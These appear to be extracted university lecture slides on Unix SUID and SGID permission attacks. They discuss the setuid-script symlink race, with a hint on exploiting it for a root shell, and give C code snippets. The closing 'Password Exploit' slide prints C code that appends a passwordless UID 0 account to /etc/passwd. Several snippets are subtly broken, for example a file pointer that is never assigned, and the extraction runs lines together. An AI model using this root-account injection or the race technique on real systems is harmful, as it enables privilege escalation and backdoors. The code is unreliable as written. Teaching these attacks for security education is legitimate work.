Unix Permissions (cont’d)

							Unix Permissions
(cont’d)



More on SUID
passwd attacks
SUID attacks

   Recall the following SGID
    attack
   What happens with a SUID
    version in Slack 7?
Linux Security

   Cannot SUID script
   It “seems” that SUID for
    shells is not transitive for
    shell creation
    – i.e the SUID’d shell has the
      owners permissions but
      subsequently created shells
      have the runner’s permissions
   Shells perform a “sanity
    check?”
Why no SUID for
Script?
   It is hard to write safe script
   Race conditions
Linux ignores the setuid bit, because the current method of invoking a
     script allows for a race condition. This has been solved on other Unix
     systems (like, say, Solaris) by invoking the interpreter and passing it
     an open file handle to the script instead of the name of it, breaking
     the race condition.

     From the perlsec man page:

          Beyond the obvious problems that stem from giving special
          privileges to systems as flexible as scripts, on many
          versions of Unix, set-id scripts are inherently insecure
          right from the start. The problem is a race condition in
          the kernel. Between the time the kernel opens the file to
          see which interpreter to run and when the (now-set-id)
          interpreter turns around and reopens the file to interpret
          it, the file in question may have changed, especially if
          you have symbolic links on your system.

     hint: symbolic links and an suid script make it trivial to run any
     program as the owner of the suid script on such systems, of which Linkux
     is one. Set up a symlink like foo->/sbin/rootly, where rootly is
     an suid script. Then run 'foo'... if you're quick and can point foo at
     myrootshell between the time the kernel decides to run perl (or sh or
     any other #!'ist script), myrootshell will run as root... even though
     it's not suid.
system() command

   This does not work?
     #include <stdlib.h>
     main() {
               system("cat alicefile");
     }




   This does
      #include <stdio.h>
      main() {
                FILE * fileptr;
                int c;
                fopen(“alicefile”, “r”);
                while( (c=fgetc(fileptr) != EOF);
                          putchar(c);
      }
Shell Security?

   SUID on the last program
    works

   This does not
       cp /etc/sh /home/alice/shell
       chmod 4711 /home/alice/shell
       su bob

       /home/alice/shell


    – bob does not get a shell with
      alice’s permission
Abuse Exploit
Abuse Results
 Password Exploit
 Instead

    Try this



#include <stdio.h>main() {
  FILE * fileptr;
  fopen("/etc/passwd", "a");
  fprintf(fileptr, "eve::0:0:,,,:/root:/bin/bash\n");
  fclose(fileptr);
}